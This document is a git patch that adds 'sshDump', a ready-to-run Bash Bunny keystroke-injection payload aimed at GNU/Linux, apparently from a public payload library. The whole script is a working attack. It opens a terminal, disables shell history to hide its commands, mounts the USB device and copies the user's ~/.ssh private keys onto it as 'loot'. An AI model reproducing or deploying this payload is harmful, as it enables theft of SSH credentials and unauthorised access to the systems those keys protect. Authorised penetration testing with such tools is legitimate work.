From db8fdc67f4f804bdf707c3b8db2728d7c61c4ca0 Mon Sep 17 00:00:00 2001
From: drapl0n tuxed0 <87269662+drapl0n@users.noreply.github.com>
Date: Sat, 5 Mar 2022 01:05:03 +0530
Subject: [PATCH] created sshDump (#499)

---
 .../library/credentials/sshDump/payload.txt   | 49 +++++++++++++++++++
 1 file changed, 49 insertions(+)
 create mode 100644 payloads/library/credentials/sshDump/payload.txt

diff --git a/payloads/library/credentials/sshDump/payload.txt b/payloads/library/credentials/sshDump/payload.txt
new file mode 100644
index 00000000..01ee9ad0
--- /dev/null
+++ b/payloads/library/credentials/sshDump/payload.txt
@@ -0,0 +1,49 @@
+# Title: sshDump
+# Description: Taking advantage of plain stored ssh private keys in home dir, sshDump grabs them for you.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Credentials
+# Target: GNU/Linux.
+# Attackmodes: HID, Storage.
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [Looting]
+Q STRING cp -r '~/.ssh' '$mntt/loot/SSH'
+Q ENTER
+Q DELAY 2000
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER 
+LED FINISH